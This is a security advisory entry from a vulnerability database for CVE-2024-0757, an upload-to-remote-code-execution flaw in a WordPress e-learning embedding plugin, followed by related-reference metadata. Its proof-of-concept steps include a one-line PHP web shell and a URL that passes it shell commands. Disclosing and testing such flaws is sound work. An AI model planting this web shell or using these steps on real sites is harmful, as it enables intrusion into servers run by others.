Lucene search
Dmitrii IgnatyevWPEX-ID:ECCD017C-E442-46B6-B5E6-AEC7BBD5F836HistoryMay 14, 2024 - 12:00 a.m.
Insert or Embed Articulate Content into WordPress <= 4.3000000023 - Author+ Upload to RCE
2024-05-1400:00:00
Dmitrii Ignatyev
59
wordpress
embedding
rce
security update
exploit
Description The plugin is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files
Note: This must be tested on a web server running Apache
1) Create a new post
2) Add e-Learning block to the post and upload a zip file containing a blank HTML file (e.g. `main.html`) and a Phar filed with the name `cmd.phar`). In `cmd.phar`, add the contents `<?php echo system($_GET['cmd']); ?>`. Malicious .htaccess files works too.
3) After uploading, browse to http://example.com//wp-content/uploads/articulate_uploads/__ZIP_NAME_HERE__/cmd.phar?cmd=ls
4) You will see a listing of contents using the `ls` commandReferences
Related
vulnrichment
vulnrichment
nvd
nvd
CVE-2024-0757
2024-06-04 06:15:08
cvelist
cvelist
wpvulndb
wpvulndb
cve
cve
CVE-2024-0757
2024-06-04 06:15:08
githubexploit
githubexploit
Exploit for CVE-2024-0757
2024-06-17 07:46:21
wordfence
wordfence
AI Score
6.8
Confidence
Low
EPSS
0
Percentile
9.0%
Related for WPEX-ID:ECCD017C-E442-46B6-B5E6-AEC7BBD5F836